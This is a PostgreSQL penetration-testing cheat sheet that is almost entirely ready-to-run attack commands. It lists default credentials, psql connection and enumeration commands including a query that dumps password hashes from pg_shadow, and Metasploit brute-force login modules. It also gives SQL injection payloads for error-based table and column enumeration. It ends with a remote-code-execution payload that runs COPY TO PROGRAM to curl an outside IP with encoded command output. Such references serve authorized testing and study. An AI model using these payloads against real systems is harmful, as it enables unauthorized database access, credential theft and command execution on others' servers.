Skip to content

5432 - Pentesting psql

Users

user pass
postgres postgres
postgres password

Connect (local)

psql -U postgres

Connect (remote)

psql -h $IP -U postgres -W postgres
psql -h $IP -U postgres -d <database>
psql -h <host> -p <port> -U postgres -W postgres <database>
\list # List databases
\c <database> # use the database
\d # List tables
\du+ # Get users roles

# Get current user
Select user;

# List schemas
SELECT schema_name,schema_owner FROM information_schema.schemata;
\dn+

#List databases
SELECT datname FROM pg_database;

#Read credentials (usernames + pwd hash)
SELECT usename, passwd from pg_shadow;

# Get languages
SELECT lanname,lanacl FROM pg_language;

# Show installed extensions
SHOW rds.extensions;

# Get history of commands executed
\s

Enumeration

nmap

nmap -sV -sC -p 5432 10.0.2.5 
metasploit - version
use auxiliary/scanner/postgres/postgres_version
set RHOSTS 10.0.2.5
set USERNAME hacker
unset PASSWORD
options
run
metasploit - login
use auxiliary/scanner/postgres/postgres_login
set RHOSTS 10.0.2.5
set BLANK_PASSWORDS true
set DATABASE template1
set STOP_ON_SUCCESS true
set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_userpass.txt
set USER_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt
options
run

SQL Injection

basic

x' or 1=1 -- x
x' or (1=1 and username='admin') -- x
x' or (1=1 and (SELECT count(*) FROM users) = 1) -- x
x'; SELECT CAST(password AS DATE) FROM users; -- x
list of tables
x'; SELECT cast(cast(json_agg(table_name) as varchar) as boolean) FROM information_schema.tables; -- x
list of columns
x'; SELECT cast(cast(json_agg(column_name) as varchar) as boolean) FROM information_schema.columns where table_name = 'users'; -- x
RCE
x'; copy (SELECT '') to program 'curl http://10.10.14.13?f=`whoami|base64`'-- x